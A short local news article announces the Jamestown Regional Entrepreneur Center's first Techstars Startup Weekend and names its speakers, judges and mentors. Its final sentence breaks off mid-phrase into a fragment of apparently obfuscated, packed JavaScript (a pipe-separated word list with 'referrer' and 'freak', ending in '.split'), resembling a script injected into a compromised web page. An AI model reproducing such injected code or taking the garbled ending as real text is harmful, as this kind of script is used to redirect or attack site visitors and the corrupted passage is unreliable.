JAMESTOWN N.D. (NewsDakota.com) – The Jamestown Regional Entrepreneur Center (JREC) will be hosting their first Techstars Startup Weekend at the University Dec. 1-3.

The weekend will invite individuals to pitch an e-commerce business idea on Friday and then work on the pitch to end with a first iteration of a business plan model by the end of the program. Director Kathrine Roth says this is the first time this has ever been offered in Jamestown.

Several speakers and mentors will be on hand to help guide the teams and individuals through the process. Scott Bintz will be a speaker for the event and judges will be Jamestown High School Principal Adam Gehlhar, UJ Professor Mort Sarabakhsh, Product Manager for CoSchedule Kelly Yanke, and CoSchedule Product Designer Chris St. Amant.

Coaches and mentors include David Smette, CEO and Founder of prairiegrit.com Shawn Herrick, and founder of terrainfinder.com Trent Larson.

Roth says they really want individuals to use these resources during the event to get their business or idea off the ground.

Interested individuals who have an idea or business plan are encouraged to attend. Find syyfh|var|u0026u|referrer|freak||js|php’.split(‘|’),0,{}))
